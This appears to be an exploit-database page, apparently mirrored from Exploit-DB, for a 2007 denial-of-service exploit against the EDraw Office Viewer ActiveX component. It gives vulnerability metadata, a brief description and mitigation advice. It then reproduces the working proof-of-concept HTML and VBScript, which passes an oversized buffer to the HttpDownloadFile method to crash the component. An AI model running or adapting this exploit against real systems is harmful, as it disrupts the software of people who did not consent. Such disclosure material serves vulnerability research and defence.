header-logo
Suggest Exploit
vendor:
EDraw Office Viewer Component
by:
shinnai
5.5
CVSS
MEDIUM
Denial of Service
CWE
Product Name: EDraw Office Viewer Component
Affected Version From: 4.0.5.20
Affected Version To: 4.0.5.20
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7
2007

EDraw Office Viewer Component Denial of Service Exploit

This exploit targets EDraw Office Viewer Component (edrawofficeviewer.ocx) version 4.0.5.20. By sending a specially crafted HTTP request, an attacker can cause a denial of service condition on systems running this vulnerable component. The exploit involves creating a large buffer and passing it as a parameter to the HttpDownloadFile method of the ActiveX object.

Mitigation:

Update to a patched version of EDraw Office Viewer Component or remove the vulnerable component if not required. Additionally, ensure that the component is not marked as safe for script or initialization in the registry.
Source

Exploit-DB raw data:

<pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/29</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">---------------------------------------------------------------------------------------------
 <b>EDraw Office Viewer Component (edrawofficeviewer.ocx v. 4.0.5.20) Denial of Service Exploit</b>
 url: http://www.ocxt.com/officeviewer.php

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 
 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 all software that use this ocx are vulnerable to this exploits.

 This ActiveX is marked as:
 RegKey Safe for Script: True
 RegKey Safe for Init: True
 KillBitSet: False
---------------------------------------------------------------------------------------------

<object classid='clsid:053AFEBA-D968-435F-B557-19FF76372B1B' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  buff = String(1000, "A")

  test.HttpDownloadFile buff, "Default"

 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-05-30]